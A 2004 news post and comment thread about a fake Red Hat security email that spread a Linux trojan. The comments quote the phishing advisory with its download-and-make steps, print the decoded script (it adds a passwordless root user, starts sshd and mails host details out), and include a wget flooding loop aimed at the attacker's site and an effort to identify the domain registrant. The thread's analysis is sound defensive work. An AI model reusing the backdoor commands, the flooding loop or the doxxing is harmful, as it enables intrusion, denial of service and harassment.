Beware 'Fedora-Redhat' Fake Security Alert
rixdaffy writes "I just received an email from the 'Redhat Security Team' telling me that I needed to download some tar file from fedora-redhat.com. Besides the fact that I don't use Red Hat/Fedora, I immediately smelled something fishy. Maybe it's not the first trojan targeted at Linux users, but together with the official-sounding domain, it could trick some users into downloading and running the binary. It looks like Red Hat is already aware of the issue." According to Red Hat's page, "These emails tell users to download and run an update from a user's home directory. This fake update appears to contain malicious code." Update: 10/25 01:32 GMT by T : One borked link, unborked.
text of site (Score:5, Informative)
Last revised: October 20, 2004
Source: RedHat
A complete revision history is at the end of this file.
Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that *BSD and Solaris platforms are NOT affected.
The RedHat Security Team strongly advises you to immediately apply the fileutils-1.0.6 patch. This is a critical-critical update that you must make by following these steps:
* First download the patch from the Stanford RedHat mirror: wget www.fedora-redhat.com/fileutils-1.0.6.patch.tar.g
* Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
* cd fileutils-1.0.6.patch
* make
*
Anybody running RedHat and Fedora are strongly adviced to apply this patch! Read more about this vulnerability at www.redhat.com or www.fedora.redhat.com
Thank you for your prompt attention to this serious matter,
RedHat Security Team.
Copyright © 2004 Red Hat, Inc. All rights reserved.
Re: text (Score:5, Insightful)
Re: text (Why? Because.) (Score:5, Insightful)
Because sending loads of traffic to a site that is actively trying to get a trojan onto unsuspecting boxes seems like a pretty bad idea.
Apart from those that might click through without bothering to RTFA, and mistakenly think that it's a legit patch, there are also all those browser exploits (such as the Microsoft jpeg exploit) that could also be waiting on the site for unpatched systems.
Re: text (Why? Because.) (Score:5, Insightful)
Though it's a shitty thing for someone to be doing, as it is anytime somebody tries to get a virus or exploit going, it is at the same time a very amusing example of one. Think about it, the concept of this one has a certain beauty: It is meant to be activated while the machine is under the control of someone who should know better. There is no clueless-luser-carelessly-clicking that can be done here, you've got to know some basic geek stuff to go get the 'patch', unpack it, install it.. You've got to expend a reasonable amount of effort to get nailed by this thing. That is both its curse and its beauty.
Re: text (Why? Because.) (Score:5, Funny)
Re: text (Why? Because.) (Score:5, Funny)
Thank you.
Christ, they didn't do a very good job... (Score:5, Insightful)
Re:Christ, they didn't do a very good job... (Score:5, Funny)
Thus we would like to thank you for your generous time in helping this valuable project reach its full potential.
You may also like to take note of our web site www.bugzilla-Fedora-Redhat.com, where we have set up a forum dedicated to improving our product.
Re:Christ, they didn't do a very good job... (Score:3, Funny)
Re:Christ, they didn't do a very good job... (Score:3, Insightful)
Re:Christ, they didn't do a very good job... (Score:4, Informative)
Uhm...you are massively confused. The whole point of Fedora Legacy is to provide such updates.
Re:Christ, they didn't do a very good job... (Score:4, Funny)
We do?
Re:text of site (Score:5, Funny)
Re:text of site (Score:4, Interesting)
Beyond those obvious problems, the "best" targets of something like this (businesses) would have people who know better than this. Those people would know how a patch file would work. At minimum the "./inst" section should say "make install", which is much more common. So this would only affect the "newbie" Linux user. Last of all, I would expect that anything RedHat issued would say something like "or get the update through Red Carpet (or whatever their 'Windows Update' is called)".
This isn't a very well made forgery. They could have easily taken a true RedHat advisory and modified it so the language would be better and sound more plausible. They could have at LEAST gotten someone who knows English better.
Does anyone else find it strange someone would go through all the trouble of registering a domain-name to run this scam? Why not say "download it off the (such and such) mirror at ftp://120.584.391.568/pub/mirror/redhat/patches/patch_file.tar.gz" or something like that. Use any domain name and make it look like a mirror. When was the last time any company put a file for users at "(domainname).com/file.tar.gz"? Never.
Most people could have done better, IMHO.
Re:text of site (Score:5, Informative)
Also, a simple thing such as that this time you're not recommended to simply start up2date or yum to get updates as usual really should set off some alarms in people's minds. And that fedora-redhat.com is not and has never been used by Fedora or Red Hat. And so on.
I doubt that many fell for this.
Re:text of site (Score:5, Informative)
And there is more, but hey....
We knew this day would come (Score:4, Insightful)
Re:We knew this day would come (Score:5, Funny)
Re:We knew this day would come (Score:5, Interesting)
Allowing only registered executables to run could be set up to prevent such things. Microsoft signs their patches and programs too, but no regular user will ever check.
Incorporate such functions in the OS or GUI. Harass the user whenever an executable or shared library is introduced to the system: "Here are the certifications, do you trust this?"
Limiting permissions up to the user level is not enough anymore: VM based environments such as Java and
First time I saw a similar feature was in Kerio Personal Firewall, which would ask every time a new program would attempt to connect somewhere, or have something connect to a port it opened. It was simple and effective, and the 'harassment' was more than worth it (SP2 does something similar, but it's flawed*).
In conclusion. I want to say that I believe if all people had:
1) Startup Monitor [mlin.net] - Painfully simple, no one should be without it.
2) Kerio Personal Firewall [kerio.com], or equivalent
3) An executable monitor as described above.
* SP2 tells you when an executable tries to connect, and waits for you to decide if you want to block it, but it *does* allow the connection to work until you decide what to do with it. Furthermore, I'm not sure if it can tell if an executable was replaced with a compromised version (Kerio has MD5 hashes)
Re:We knew this day would come (Score:3, Insightful)
> if all people had:
>
> 1) Startup Monitor - Painfully simple, no one
> should be without it.
I use startup monitor. It is good. The problem is that the vast majority of Windows users are so habitualised into clicking 'YES' all the time that nasties will often get installed anyway.
Malware: Do you want to install this nasty browser hijacker?
n00b: Yes, just give me my goddamn "tropical aquarium" screensaver already!
> 2) Kerio Personal Firewall, o
Re:We knew this day would come (Score:5, Interesting)
And allowing only registered executables to run is a bad thing. Who should decide?
On my computer, I should decide, and the registration dealie should provide me with the information I need to make the decision.
The two parts of Microsoft's weird DRM thing I disagree with (with regards to running executables) are that the key is inaccessible to me, stashed somewhere in the BIOS, and that Microsoft is the one who decides what is safe and what isn't.
Re:We knew this day would come (Score:4, Insightful)
Here is where the real danger lies, getting Linux on the desktop and having your grandma fall for this type of tripe, it will give *nix a bad name. "Oh no, Linux is just as vulnerable as Windows" No - it's the users that are vulnerable, and the users that need to be educated. We all do what we can to lock down our boxen, but in the end it too often comes down to what's between the chair and the keyboard.
Re: (Score:3, Interesting)
About Time (Score:4, Insightful)
Re:About Time (Score:3, Informative)
hasn't happened on my SGI yet.
I'll try it... (Score:5, Interesting)
Stay tuned.
Re:I'll try it... (Score:5, Informative)
Re: I'll try it... Execution results! (Score:5, Informative)
adduser: No more than two names.
passwd: Unknown user bash
Could not load host key:
Could not load host key:
Could not load host key:
Disabling protocol version 1. Could not load host key.
Disabling protocol version 2. Could not load host key.
sshd: no hostkeys available -- exiting.
System looks OK. Proceeding to next step.
Patching "ls": ###########
Patching "mkdir": ##########
System updated and secured successfully. You may erase these files.
Re: I'll try it... Execution results! (Score:5, Informative)
Re: I'll try it... Execution results! (Score:5, Informative)
Dogg
Re: I'll try it... Execution results! (Score:3, Funny)
Re: I'll try it... Execution results! (Score:4, Interesting)
From shc's manpage:
Definitely doing something then, at least viewing the parent post.
Re: I'll try it... Execution results! (Score:5, Informative)
echo "Inca un root frate belea: " >>
adduser -g 0 -u 0 -o bash >>
passwd -d bash >>
ifconfig >>
uname -a >>
uptime >>
sshd >>
echo "user bash stii tu" >>
cat
rm -rf
(I'd post the whole script but the lameness filter won't let me)
Create a user named bash, no password
grab the ip and uptime, start ssh
mail the results
Re: I'll try it... Execution results! (Score:5, Interesting)
Re: I'll try it... Execution results! (Score:5, Funny)
If you do, make sure the IP addresses are of
Re: I'll try it... Execution results! (Score:3, Funny)
Try:
These are more than good enough.
Re: I'll try it... Execution results! (Score:3, Insightful)
Not if you run your own mail server(s).
As a test of why this is a BAD IDEA, send a message from your servers to an outside account. Read the full headers. Notice helpful little things there including IP addresses?
(Yes, you can send the message through your own servers to another account...though it might make reading the headers even more confusing if you've never do
Re: I'll try it... Execution results! (Score:4, Informative)
Been there, done that:
<root@addlebrain.com>: host sitemail.everyone.net[216.200.145.51] said: 554
Recipient Rejected: Not accepting mail for this account : Account
terminated due to violation of user agreement
link to a translation (Score:3, Informative)
Contents of inst.c... (Score:5, Informative)
View inst.c [gee-enginuity.com]
Re:Contents of inst.c... (Score:5, Funny)
Hey, stop trying to deny my GPL rights you Windows-loving tyrant!
Re:I'll try it... (Score:5, Informative)
There are 3 files:
fileutils-patch.bin
inst.c
Makefile
fileutils-patch.bin is an rpm with an incorrect extension, but it's valid. And an actual RPM from redhat (verified the GPG signature). Probably just put there to make it look bigger, and have something that came from redhat.
Well I was gonna put the package header information here, but slashcode didn't like it.
Signature verification using "rpm --checksig fileutils-patch.bin"
Re:I'll try it... (Score:5, Informative)
The working bit of the script is:
echo "Inca un root frate belea: " >>
adduser -g 0 -u 0 -o bash >>
passwd -d bash >>
ifconfig >>
uname -a >>
uptime >>
sshd >>
echo "user bash stii tu" >>
cat
rm -rf
So, adds a user called bash with root privs, starts sshd and emails your IP address to someone.
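Added example (not part of the thread and not the trojan's code): a check for the two account changes the posted script makes, a second UID-0 account created with `adduser -g 0 -u 0 -o` and a password field emptied with `passwd -d`. The passwd and shadow contents below are constructed samples with placeholder hashes, and the function names are this example's own.

```python
"""Audit passwd/shadow text for the changes this trojan's script makes."""

# Constructed sample data: the state left behind by
#   adduser -g 0 -u 0 -o bash ; passwd -d bash
# next to ordinary accounts. Hashes are placeholders, not real values.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:2:2:daemon:/sbin:/sbin/nologin
alice:x:500:500:Alice:/home/alice:/bin/bash
bash:x:0:0::/home/bash:/bin/bash
"""

SAMPLE_SHADOW = """\
root:$1$PLACEHOLDER$hash:12715:0:99999:7:::
daemon:*:12715:0:99999:7:::
alice:$1$PLACEHOLDER$hash:12715:0:99999:7:::
bash::12715:0:99999:7:::
"""


def _records(text, min_fields):
    """Yield colon-split records, skipping blanks, comments and short lines."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) >= min_fields:
            yield fields


def audit_accounts(passwd_text, shadow_text):
    """Return (account, reason) findings in passwd file order."""
    shadow = {f[0]: f[1] for f in _records(shadow_text, 2)}
    findings = []
    for f in _records(passwd_text, 7):
        name, pw_field, uid = f[0], f[1], f[2]
        # -o lets adduser reuse UID 0, so any second UID-0 name is root.
        if uid == "0" and name != "root":
            findings.append((name, "uid 0 shared with root"))
        # "x" means the real password field lives in the shadow file.
        secret = shadow.get(name) if pw_field == "x" else pw_field
        if secret is None:
            findings.append((name, "no shadow entry"))
        elif secret == "":
            # passwd -d leaves the field empty: no password is required.
            findings.append((name, "empty password field"))
    return findings


if __name__ == "__main__":
    for name, reason in audit_accounts(SAMPLE_PASSWD, SAMPLE_SHADOW):
        print(f"{name}: {reason}")
```

Locked or disabled entries such as `*` in the shadow field are not reported, since they do not allow a passwordless login.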
Re:I'll try it... (Score:5, Informative)
Registration Service Provided By: StoreIQ, Inc.
Contact: technical@storeiq.com
Visit:
Domain name: addlebrain.com
Registrant Contact:
ABM Wireless
Domain Administrator (administrator@buywirelessdirect.com)
+1.7323331100
Fax: +1.NA
3587 US Highway 9 #132
Freehold, NJ 07728
US
Administrative Contact:
ABM Wireless
Domain Administrator (administrator@buywirelessdirect.com)
+1.7323331100
Fax: +1.NA
3587 US Highway 9 #132
Freehold, NJ 07728
US
Technical Contact:
ABM Wireless
Domain Administrator (administrator@buywirelessdirect.com)
+1.7323331100
Fax: +1.NA
3587 US Highway 9 #132
Freehold, NJ 07728
US
Billing Contact:
ABM Wireless
Domain Administrator (administrator@buywirelessdirect.com)
+1.7323331100
Fax: +1.NA
3587 US Highway 9 #132
Freehold, NJ 07728
US
Status: Locked
Name Servers:
dns1.name-services.com
dns2.name-services.com
dns3.name-services.com
dns4.name-services.com
dns5.name-services.com
The same address is used for two associated domains, buywirelessdirect.com (the email addy for this domain's tech contact) and storeiq.com (the email addy for buywirelessdirect.com's tech contact). The area code is accurate for that neck of the woods too, though I haven't tried the phone number (yet):
StoreIQ, Inc.
John Thompson (technical@storeiq.com)
+1.7323331145
Fax:
3587 US Highway 9 #213
Freehold, NJ 07728
US
Re:I'll try it... (Score:3, Informative)
Re:I'll try it... (Score:3, Informative)
-translation: one more "root" brother trouble
echo "user bash stii tu" >>
-translation:
cat
-translation: one more wheel (roata -- root... it sounds alike)
It doesn't say anything meaningful, the guy is an idiot.
I love it! (Score:5, Funny)
(Mind you, I'm no better. First time I got a computer virus, when I was running MSDOS, my first reaction was to run a binary diff against a clean version of the file, and disassemble the result to see what it did. Do you know if there's a cure for this?)
Re:I love it! (Score:3, Insightful)
A cure for what? Human curiosity? Why on Earth would anyone want to be "cured" from that, and become something less instead. It's one of the few good qualities that have brought us so far despite our lacking on other important areas...
On computer geeks, need to know how things work naturally becomes directed towards computers...
Re:I love it! (Score:4, Insightful)
You don't want a cure for this.
If you want a legitimate comparison between Linux and Windows security, observe:
This is new and fresh enough to "set up a sandbox environment and run it, to see what happens!" Another Windows similar thingee, "been there done that".
Dated 23rd October 2004 on http://www.redhat.com/security/ which means that Red Hat was on top of it fast. This isn't the kind of thing that Slashdot sits on and Red Hat was one day plus ahead. For comparison, it took about 6 days for Microsoft to return anything about Code Red on a search from microsoft.com. That's 6 days after appearing on Slashdot (compared to 1 day before).
Re:I love it! (Score:3, Funny)
Re:I'll try it... (Score:4, Informative)
The makefile compiles an application called inst that seems to have been created with the shc script compiler.. it's rather obfuscated.. attempting to reverse engineer now
Re:I'll try it... (Score:3, Informative)
I'm retarded (Score:4, Informative)
Re:I'm retarded (Score:5, Informative)
won't work (Score:3, Insightful)
Here's what WHOIS says: (Score:5, Informative)
[Redirected to whois.melbourneit.com]
[Querying whois.melbourneit.com]
[whois.melbourneit.com]
Domain Name.......... fedora-redhat.com
Creation Date........ 2004-10-24
Registration Date.... 2004-10-24
Expiry Date.......... 2005-10-24
Organisation Name.... Raymond Jackson
Organisation Address. 224 Cedar Avenue
Organisation Address.
Organisation Address. New York
Organisation Address. 95301
Organisation Address. NY
Organisation Address. UNITED STATES
Admin Name........... Raymond Jackson
Admin Address........ 224 Cedar Avenue
Admin Address........
Admin Address........ New York
Admin Address........ 95301
Admin Address........ NY
Admin Address........ UNITED STATES
Admin Email.......... rayjackson23@yahoo.com
Admin Phone.......... +1.2098994533
Admin Fax............
Tech Name............ YahooDomains TechContact
Tech Address......... 701 First Ave.
Tech Address.........
Tech Address......... Sunnyvale
Tech Address......... 94089
Tech Address......... CA
Tech Address......... UNITED STATES
Tech Email........... domain.tech@YAHOO-INC.COM
Tech Phone........... +1.6198813096
Tech Fax............. +1.6198813010
Name Server.......... yns1.yahoo.com
Name Server.......... yns2.yahoo.com
Re:Here's what WHOIS says: (Score:3, Informative)
Re:Here's what WHOIS says: (Score:3, Informative)
Whois on domains are easily faked (Score:3, Informative)
However, the IP block clearly belongs to Yahoo, whois 66.218.75.0 lists contact point netblockadmin@yahoo-inc.com [mailto]
Anybody feel like dropping them a line to tell them they're hosting trojaners?
Re:Here's what WHOIS says: (Score:3, Informative)
Found a referral to whois.enom.com.
Re:Here's what WHOIS says: (Score:5, Funny)
Sorry to disappoint you, but I doubt he owns the domain - they offer free webmail, so it's likely he just signed up for an account. Presumably they didn't stop anyone from getting the username 'root' - I signed up for 'administrator' just now (password 'monkey' if you don't believe me) with no problems.
Re:Here's what WHOIS says: (Score:3, Insightful)
Real link? (Score:5, Insightful)
Re:Real link? (Score:4, Informative)
Re:Real link? (Score:3, Interesting)
I'm running the following script on my box, and I recommend others to do the same.
while true; do wget www.fedora-redhat.com/fileutils-1.0.6.patch.tar.g
If enough people do the same, either the site is taken offline, or we're gonna cost him a pretty penny.
Re:Real link? (Score:4, Funny)
Oops.
--Re:two good reasons (Score:4, Informative)
Security only works when you know what to check (Score:4, Insightful)
However, what good is that against Joe User who falls for the bait and thinks the e-mail is authentic because they believe everything they read on their screen? They don't know to check for the "security seals" and since they don't see any red flags indicating that this is bogus.
It's something in info security that disconnects when dealing with average users. They don't know what to look for, and therefore the absence of those marks is not alarming to them as it is for us... a little something that needs to be cleaned up before Linux is ready for desktop primetime.
Stupid Tricks? (Score:5, Interesting)
Re:Stupid Tricks? (Score:5, Funny)
No monitor.
Surprisingly (Score:5, Funny)
Everyone checks the gpg signatures right?
Use the /. effect for good (Score:4, Funny)
Confidence (Score:3, Insightful)
But imagine a world where Linux overwhelms Microsoft as the #1 desktop OS. Millions of Moms and Pops everywhere, using Linux. Who will they trust for their "updates"? I know for sure lots of them would fall for this particular trick, and it's one of the first times we see this. Lots of distros, lots of sources, lots of patches, major confusion.
Question (as I don't use Linux yet) : Do some of the major distros (Redhat, etc) have a webservice for updates, akin to windowsupdate.com? I sure hope so; it's essential for further desktop market share increase.
Re:Confidence (Score:3, Informative)
For the most part, they all do, even most of the little ones. Typing "yum -y update" at the command line keeps me up to date, or I could enable the cron job to do it automatically each night.
PHEW! (Score:5, Funny)
Linux - Where the malware comes with the source (Score:5, Funny)
Re:Linux - Where the malware comes with the source (Score:5, Funny)
Use SPF to protect yourself from phishing (Score:5, Informative)
If your mail client checked From: addresses against SPF records in DNS, you'd know immediately this was a hoax. Redhat.com fortunately publishes SPF records and -- score one for SPF -- they can be used to identify with 100% accuracy that the mail is not legitimate.
How can you get your mail client to check SPF records automatically? Download the Thunderbird SPF Extension [for.net].
(Disclosure: I wrote the plugin. :) )
Re:Use SPF to protect yourself from phishing (Score:4, Informative)
On another note, concerning your SPF plugin: I have two points you may wish to consider (if you already have, then fair enough).
1. The From address used by the plugin comes from the From: header in the message? I thought you're not supposed to do this with SPF; it specifies that you should check the SMTP envelope sender (the MAIL FROM line from the SMTP dialogue). This information is not available to a MUA in any standard form AFAIK.
2. What happens if I open a message I stored from a few months/years ago, and the SPF record for the domain it's from has changed? Does the plugin validate a message whenever one is opened, and will I end up with a false positive/negative?
I believe these two issues are why SPF checking must be performed on the server side. The mail server alone has reliable access to the SMTP envelope sender, and can add a Received-SPF header at the time of message reception, which is the only time when it is guaranteed that the SPF records from DNS are relevant to the message in question.
SPF done on the client side basically turns into MICROS~1's (patented, if you believe that they'll allow crap like this to be patented!) Sender-ID system, where the From address is taken from a selection of message headers.
Of course, if I'm wrong about any of this, please correct me.
Re:Use SPF to protect yourself from phishing (Score:3, Informative)
The point is that you cannot tell. The From header in the email itself tells you nothing. It is forgery of the SMTP envelope sender that SPF guards against.
Consider:
220 some mailserver... ready!
MAIL FROM: sneaky@fedora-redhat.com
250 OK
RCPT TO: some_innocent@hotmail.com
250 OK
DATA
354 you have a go
From: security@redhat.com
Subject: EMERGENCY SECURITY PATCH APPLY NOW!
Etc etc. The SPF check is performed
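Added example (not part of the thread): the envelope-versus-header distinction discussed in the comments above, checked on a stored message. It reads the server-stamped `Return-Path` and `Received-SPF` headers and reports whether an SPF pass says anything about the `From:` domain; the sample message, the receiving host name and the 192.0.2.10 address are constructed, and the relaxed subdomain matching in `same_org` is a simplification chosen for this example.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed sample: the message from the SMTP dialogue above as a receiving
# server might store it. Return-Path holds the envelope MAIL FROM and
# Received-SPF holds the server's SPF verdict. Host names and the 192.0.2.10
# address are placeholders.
SAMPLE = """\
Return-Path: <sneaky@fedora-redhat.com>
Received-SPF: pass (mx.example.net: domain of sneaky@fedora-redhat.com
 designates 192.0.2.10 as permitted sender) client-ip=192.0.2.10;
 envelope-from=sneaky@fedora-redhat.com; helo=mail.fedora-redhat.com;
From: security@redhat.com
To: some_innocent@hotmail.com
Subject: EMERGENCY SECURITY PATCH APPLY NOW!

(body omitted)
"""


def domain_of(address):
    """Lower-cased domain part of an address header value, or ''."""
    _, addr = parseaddr(address or "")
    return addr.rpartition("@")[2].lower() if "@" in addr else ""


def parse_received_spf(value):
    """Split a Received-SPF value into (result, {key: value})."""
    value = " ".join((value or "").split())      # unfold continuation lines
    if not value:
        return None, {}
    result = value.split(None, 1)[0].lower()
    rest = re.sub(r"\([^)]*\)", "", value)       # drop the free-text comment
    return result, dict(re.findall(r"([A-Za-z-]+)=([^;\s]+)", rest))


def same_org(a, b):
    """Relaxed match: identical, or one is a dot-separated subdomain."""
    return bool(a and b) and (
        a == b or a.endswith("." + b) or b.endswith("." + a))


def assess(raw):
    """Compare the SPF-checked envelope domain with the From: domain."""
    msg = message_from_string(raw)
    header_from = domain_of(msg.get("From"))
    result, pairs = parse_received_spf(msg.get("Received-SPF"))
    envelope = domain_of(pairs.get("envelope-from") or msg.get("Return-Path"))
    aligned = same_org(header_from, envelope)
    if result is None:
        verdict = "no server-side SPF result recorded"
    elif result != "pass":
        verdict = f"SPF {result} for the envelope domain"
    elif not aligned:
        verdict = "SPF pass covers the envelope only; From: is unverified"
    else:
        verdict = "SPF pass and From: matches the envelope domain"
    return {"header_from": header_from, "envelope_from": envelope,
            "spf": result, "aligned": aligned, "verdict": verdict}


if __name__ == "__main__":
    print(assess(SAMPLE))
```

Note that `fedora-redhat.com` is not treated as a subdomain of `redhat.com`: the match requires a dot boundary, which is exactly the difference a lookalike domain relies on readers missing.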
Re:Use SPF to protect yourself from phishing (Score:3, Insightful)
Re:Use SPF to protect yourself from phishing (Score:3, Funny)
Coding 0, Grammar 0. (Score:5, Funny)
But I am running SUSE! Am I adviced in similar fashion? Perhaps I too should applying patch lest SUSE found vulnerability also? Thankyou to www.fedora-redhat.com for adviced me in this helpful manner against remote attackers!
Looks to be a Klik client? (Score:3, Informative)
Everything but the comments at the top of the page, and the shellcode, is pretty-much identical.
Klik looks to be a "KDE-based Live Installer for Knoppix".
Still looking....
Red.
Re:Looks to be a Klik client? (Score:3, Informative)
http://www.datsi.fi.upm.es/~frosal/sour
Red.
Re:Looks to be a Klik client? (Score:3, Insightful)
It seems stupid to encode the shell script into an unreadable form and then to post the sources; a few small changes to the source and it happily prints out the shell script.
Stupidity (Score:3, Funny)
contact yahoo (Score:4, Informative)
Checksum (Score:4, Funny)
68349c219d941209af8f7c968b89d622 *fileutils-1.0.6.patch.tar.gz
So you can be sure you're getting the real fake patch.
Updated version from a couple of days ago... (Score:4, Interesting)
Whoever is behind this certainly seems to be doing a very sloppy job of it. Yahoo, Melbourne IT, Stanford, hosting at "everyone.net"; hardly a who's who of dodgy companies and "bullet proof" service providers, is it? Frankly, I'm expecting to be reading a Slashdot story about a bust by the end of the week, and that's being generous.
notifying the appropriate people.... (Score:3, Interesting)
abuse@above.net
Subject : malware using your netblock to propagate
http://it.slashdot.org/article.pl?sid=04/10/24/2352234&tid=172&tid=110&tid=218&tid=106
The story reports on a linux trojan that, after installing, emails a
report back to root@addlebrain.com. The MX record for addlebrain.com
points to sitemail.everyone.net. It would reduce the effect of this if
you could shut down that email account.
Better yet, you should gather the list of infected IPs and then inform
the owners.
Damian Menscher
--
-=#| Physics Grad Student & SysAdmin @ U Illinois Urbana-Champaign |#=-
-=#| 488 LLP, 1110 W. Green St, Urbana, IL 61801 Ofc:(217)333-0038 |#=-
-=#| 4602 Beckman, VMIL/MS, Imaging Technology Group:(217)244-3074 |#=-
-=#| <menscher@uiuc.edu> www.uiuc.edu/~menscher/ Fax:(217)333-9819 |#=-
-=#| The above opinions are not necessarily those of my employers. |#=-
From the WHOIS: (Score:3, Informative)
Raymond Jackson
224 Cedar Avenue
New York, NY 95301.
209 899-4533
However, 95301 is an Atwater, CA zip code.
So, I looked up Raymond Jackson in Atwater. What did I find?
Raymond Jackson
224 Cedar Avenue
Atwater, CA 95301
209 358 8510.
Looks like he did a crappy job of disguising his identity. Go get him!!!
Full decryption of the shell script (Score:4, Informative)
Re:I wonder... (Score:4, Funny)
Probabilities: (Score:5, Funny)
If the Antivirus companies were responsible, they'd have done a better job.
If Microsoft was responsible, they wouldn't have included any source code.
If SCO was responsible, they'd have included sourcecode and then sued you for running it
All things taken into consideration, I'm with 'other' on this one
Re:Finally... (Score:5, Funny)
It keeps the "Mandrake Crew" off of the debian-users lists.
Re:Trademark infringement... (Score:3, Funny)
Re:bastards (Score:5, Insightful)
don't bother wasting your time.... (Score:3, Informative)
fedora-redhat.com has address 66.218.79.149
fedora-redhat.com has address 66.218.79.155
fedora-redhat.com has address 66.218.79.147
fedora-redhat.com has address 66.218.79.148
whois 66.218.79.149
OrgName: Yahoo!
OrgID: YAOO
Address: 701 First Avenue
City: Sunnyvale
StateProv: CA
PostalCode: 94089
Country: US
NetRange: 66.218.64.0 - 66.218.95.255
CIDR: 66.218.64.0/19
Trying to ddos yahoo won't get you very far : )
Re:look at this in a different way (Score:3, Funny)
"Attached is a sexy picture of Anna Kournikova.
To view the picture, simply:
1) save the attachment
2) su -
3) tar -xjf anna.tar.gz
4)
5) make
6) make install
7) anna"